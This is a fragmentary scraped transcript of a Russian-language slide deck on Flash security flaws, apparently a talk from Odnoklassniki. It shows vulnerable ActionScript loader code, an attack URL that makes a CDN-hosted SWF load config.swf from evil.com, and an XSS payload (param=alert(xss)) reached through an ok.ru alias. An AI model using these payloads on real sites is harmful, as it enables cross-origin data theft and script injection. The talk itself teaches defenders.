flash умер. Да здравствует flash!

of 15/15
Flash умер. Да здравствует Flash! Александра Сватикова Одноклассники

Post on 16-Jan-2017

516 views

Category:

Technology

1 download

Embed Size (px)

TRANSCRIPT

  • Flash . Flash!

  • Flash

    Application sandbox

    Security domain / application domain

  • #1 Same-Origin Policy bypass

    http://st.mycdn.me/vulnerable.swf?conf=config.swf

    Jakub oczek (@zoczus)

    loader.load(new URLRequest(loaderInfo.parameters.conf), new LoaderContext(false, new ApplicationDomain(), SecurityDomain.currentDomain)); !addChild(loader);

    http://st.mycdn.me/vulnerable.swf?conf=config.swf

  • #1 Same-Origin Policy bypass

    http://st.mycdn.me/vulnerable.swf?conf=http://evil.com/config.swf

    Jakub oczek (@zoczus)

    http://st.mycdn.me/vulnerable.swf?conf=config.swf

    loader.load(new URLRequest(loaderInfo.parameters.conf), new LoaderContext(false, new ApplicationDomain(), SecurityDomain.currentDomain)); !addChild(loader);

    http://st.mycdn.me/vulnerable.swf?conf=http://evil.com/config.swfhttp://st.mycdn.me/vulnerable.swf?conf=config.swf

  • #1 Same-Origin Policy bypass

    evil.com mycdn.me

    Jakub oczek (@zoczus)

    http://st.mycdn.me/vulnerable.swf?conf=config.swf

    loader.load(new URLRequest(loaderInfo.parameters.conf), new LoaderContext(false, new ApplicationDomain(), SecurityDomain.currentDomain)); !addChild(loader);

    http://st.mycdn.me/vulnerable.swf?conf=config.swf

  • #1 Same-Origin Policy bypassJakub oczek (@zoczus)

    http://ok.ru/crossdomain.xml

    ... ...

    http://ok.ru/crossdomain.xml

  • #1 Same-Origin Policy bypassJakub oczek (@zoczus)

    http://ok.ru/crossdomain.xml

    evil.com ok.ru

    ... ...

    http://ok.ru/crossdomain.xml

  • #2 Phishing
  • #2 Phishing

  • #2 Phishing
  • #3 XSS in CDN domainhttp://st.mycdn.me/vulnerable.swf?param=username

    _root.createTextField("Inputbox",0,20,20,320,240); _root.Inputbox.html=true; _root.Inputbox.htmlText=Welcome " + _root.param;

    http://st.mycdn.me/vulnerable.swf?param=alert(xss)

  • #3 XSS in CDN domain

    $ host st.mycdn.me st.mycdn.me has address 217.20.152.226 $ $ host videoplayer.ok.ru videoplayer.ok.ru is an alias for st.mycdn.me. videoplayer.ok.ru has address 217.20.152.226

  • #3 XSS in CDN domain

    $ host st.mycdn.me st.mycdn.me has address 217.20.152.226 $ $ host videoplayer.ok.ru videoplayer.ok.ru is an alias for st.mycdn.me. videoplayer.ok.ru has address 217.20.152.226

    http://videoplayer.ok.ru/vulnerable.swf?param=alert(xss)

  • !